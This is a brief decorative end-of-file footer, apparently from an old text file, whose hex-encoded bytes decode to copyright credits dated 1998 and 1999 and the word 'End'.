-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]